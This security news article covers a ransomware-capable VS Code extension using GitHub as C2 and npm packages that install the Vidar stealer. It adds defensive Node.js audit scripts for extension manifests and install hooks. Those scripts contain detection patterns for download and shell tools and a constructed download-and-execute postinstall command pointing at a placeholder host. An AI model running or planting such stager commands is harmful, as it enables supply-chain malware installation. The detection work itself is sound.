Cybersecurity researchers have uncovered a malicious Visual Studio Code (VS Code) extension named "susvsex" that possesses rudimentary ransomware capabilities. This extension, believed to have been created with the assistance of artificial intelligence (so-called 'vibe-coded' malware), was flagged by Secure Annex researcher John Tuckner. Interestingly, the extension makes no attempt to conceal its malicious nature. It was uploaded on November 5, 2025, by a user calling themselves "suspublisher18" with a minimalistic description, "Just testing," and an obviously fake email address: "donotsupport@example.com." The extension's functionality is to automatically zip, upload, and encrypt files from a predefined directory (C:\Users\Public\testing on Windows or /tmp/testing on macOS) upon its first launch.
Microsoft acted quickly and by November 6 had already removed the extension from the official VS Code Marketplace. The extension's core malicious routine, called "zipUploadAndEncrypt," is registered to run on any activation event, so it fires as soon as the extension is installed or VS Code is launched. This function compresses a target folder into a ZIP archive, sends it to a remote server, and then encrypts the files in that directory, making them inaccessible without the decryption key. Fortunately, the targeted directory is set to a test staging folder by default, which limits the current damage, but the target could easily be changed in a future update or via commands sent over a covert command-and-control (C2) channel.
Speaking of C2, the malware cleverly uses GitHub repositories as its command center. It periodically polls a private GitHub repository for new commands by reading an "index.html" file and writes back execution results into a "requirements.txt" file using a hardcoded GitHub access token embedded in the extension. The linked GitHub account, "aykhanmv," remains active, with the developer claiming to be based in Baku, Azerbaijan. Detailed comments, README files with execution instructions, and placeholder variables left in the code hint strongly at AI-assisted creation, or 'vibe coding.' In a blunder, the extension’s package mistakenly included crucial components such as decryption tools, server code, and GitHub tokens, potentially allowing others to hijack the C2 infrastructure.
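The two traits described above, an extension that activates on every trigger and a GitHub access token hardcoded in its bundle, are both visible in a static review of the extension's package before it is installed. The following is an added example, not code from Secure Annex or from the extension itself: a small Node.js audit that reads an extension manifest plus its bundled source text and flags broad activation events, strings matching GitHub's published token formats, and calls to the GitHub repository contents API. The manifest, file names and the placeholder token are all constructed for illustration.

```javascript
// Added example (not the researchers' code): audit a VS Code extension's
// manifest and bundled sources for traits the article describes.
// Every input below is constructed for illustration.

// Token formats GitHub issues: classic PATs ("ghp_" + 36 chars) and
// fine-grained PATs ("github_pat_" + 22 chars + "_" + 59 chars).
const GITHUB_TOKEN_PATTERNS = [
  /\bghp_[A-Za-z0-9]{36}\b/g,
  /\bgithub_pat_[A-Za-z0-9]{22}_[A-Za-z0-9]{59}\b/g,
];

// Activation events that fire on every VS Code start. An extension with a
// narrow stated purpose rarely needs them.
const BROAD_ACTIVATION = new Set(["*", "onStartupFinished"]);

// Reads/writes of files in a repository via the REST contents endpoint, the
// primitive a polling C2 channel over GitHub would use.
const CONTENTS_API = /api\.github\.com\/repos\/[^/\s"']+\/[^/\s"']+\/contents\//;

// manifest: parsed package.json of the extension
// sources: { relativePath: fileContentsAsString }
// Returns an array of { kind, detail } findings (empty when nothing was flagged).
function auditExtension(manifest, sources) {
  const findings = [];
  for (const ev of manifest.activationEvents || []) {
    if (BROAD_ACTIVATION.has(ev)) {
      findings.push({ kind: "broad-activation", detail: ev });
    }
  }
  for (const [path, text] of Object.entries(sources)) {
    for (const re of GITHUB_TOKEN_PATTERNS) {
      for (const m of text.matchAll(re)) {
        // Only report a prefix so the audit log never re-leaks the secret.
        findings.push({ kind: "hardcoded-github-token", detail: `${path}: ${m[0].slice(0, 8)}...` });
      }
    }
    if (CONTENTS_API.test(text)) {
      findings.push({ kind: "github-contents-api", detail: path });
    }
  }
  return findings;
}

// Constructed sample: a manifest that activates on "*" and a source file
// carrying a placeholder token (not a real credential) and a contents-API URL.
const SAMPLE_MANIFEST = {
  name: "example-ext",
  publisher: "example-publisher",
  activationEvents: ["*"],
  main: "./extension.js",
};
const SAMPLE_SOURCES = {
  "extension.js": [
    'const TOKEN = "ghp_' + "A".repeat(36) + '"; // constructed placeholder',
    'const url = "https://api.github.com/repos/example-owner/example-repo/contents/index.html";',
  ].join("\n"),
};

console.log(JSON.stringify(auditExtension(SAMPLE_MANIFEST, SAMPLE_SOURCES), null, 2));
```

Run it against an unpacked `.vsix` (the manifest is the `extension/package.json` inside the archive) before approving an extension for a fleet; a hit on `hardcoded-github-token` is also the cue to have the token revoked, since anyone who obtains the package can use it.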
In a related discovery, Datadog Security Labs identified 17 malicious npm packages that masquerade as legitimate software development kits (SDKs). These packages, uploaded between October 21 and October 26, 2025, by accounts named "aartje" and "saliii229911," stealthily install the Vidar information stealer on compromised systems. This marks the first time Vidar has been distributed through the npm registry. Although the accounts were quickly banned, the packages had already been downloaded over 2,200 times, with many downloads possibly due to automated scrapers.
The attack mechanism within these npm packages relies on postinstall scripts defined in their "package.json" files. These scripts download a ZIP archive from an external server and execute the Vidar malware contained inside. Variants use different methods: some execute a PowerShell script before running JavaScript to complete the infection chain. Vidar samples analyzed by Datadog use hardcoded Telegram and Steam accounts as dead-drop points to locate the actual command servers. Researchers speculate that the differing postinstall implementations help evade detection by varying behavioral signatures.
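Because the infection chain described above is driven entirely by install-time lifecycle scripts, the cheapest place to catch it is the `scripts` block of each dependency's `package.json` before `npm install` is allowed to run them. The following is an added example, not Datadog's tooling or any of the malicious packages' code: a Node.js triage function that looks at the `preinstall`, `install` and `postinstall` hooks and flags commands with download, archive-extraction, shell-launch or inline-eval indicators. The three package manifests are constructed; `example.invalid` is a reserved placeholder domain.

```javascript
// Added example (not Datadog's code): flag npm package manifests whose
// install-time lifecycle scripts look like download-and-execute stagers.
// The sample manifests are constructed for illustration.

// Hooks npm runs automatically when a published package is installed.
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall"];

// Heuristic indicators; each is a behaviour a plain library rarely needs
// at install time. Case-insensitive so PowerShell casing variants match.
const STAGER_INDICATORS = [
  { name: "remote-fetch", re: /\b(curl|wget|Invoke-WebRequest|iwr)\b|https?:\/\//i },
  { name: "archive-extract", re: /\b(unzip|tar\s+-?x|Expand-Archive)\b/i },
  { name: "shell-launch", re: /\b(powershell|pwsh|cmd\.exe|\/bin\/sh|bash)\b/i },
  { name: "inline-eval", re: /\bnode\s+-e\b|\beval\(/i },
];

// Returns one record per lifecycle hook the manifest defines.
function auditLifecycleScripts(manifest) {
  const findings = [];
  const scripts = (manifest && manifest.scripts) || {};
  for (const hook of LIFECYCLE_HOOKS) {
    const command = scripts[hook];
    if (!command) continue;
    const indicators = STAGER_INDICATORS.filter((i) => i.re.test(command)).map((i) => i.name);
    findings.push({ hook, command, indicators, suspicious: indicators.length > 0 });
  }
  return findings;
}

// Returns the names of packages with at least one suspicious hook.
function triage(packages) {
  return Object.entries(packages)
    .filter(([, manifest]) => auditLifecycleScripts(manifest).some((f) => f.suspicious))
    .map(([name]) => name);
}

// Constructed sample manifests (not the real packages from the report).
const SAMPLE_PACKAGES = {
  "benign-sdk": {
    scripts: { test: "mocha", postinstall: "node scripts/print-banner.js" },
  },
  "stager-a": {
    scripts: {
      postinstall:
        "curl -sSL http://example.invalid/sdk.zip -o sdk.zip && unzip sdk.zip && node sdk/index.js",
    },
  },
  "stager-b": {
    scripts: {
      preinstall: "powershell -ExecutionPolicy Bypass -File setup.ps1",
      postinstall: "node index.js",
    },
  },
};

for (const [name, manifest] of Object.entries(SAMPLE_PACKAGES)) {
  console.log(name, JSON.stringify(auditLifecycleScripts(manifest)));
}
console.log("suspicious:", triage(SAMPLE_PACKAGES));
```

A heuristic like this belongs in CI alongside a hard control: `npm install --ignore-scripts` (or `npm config set ignore-scripts true`) stops lifecycle hooks from running at all, so a dependency that truly needs a build step has to be allow-listed deliberately rather than trusted by default.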
These incidents add to a growing list of supply chain attacks targeting open-source ecosystems like npm, PyPI, RubyGems, and Open VSX. They highlight the critical importance for developers to exercise caution, review changelogs carefully, and be aware of common attack vectors such as typosquatting and dependency confusion when incorporating third-party packages. The rise in AI-assisted malware development and increasingly sophisticated supply chain compromises underscore an urgent need for enhanced security practices across software development communities.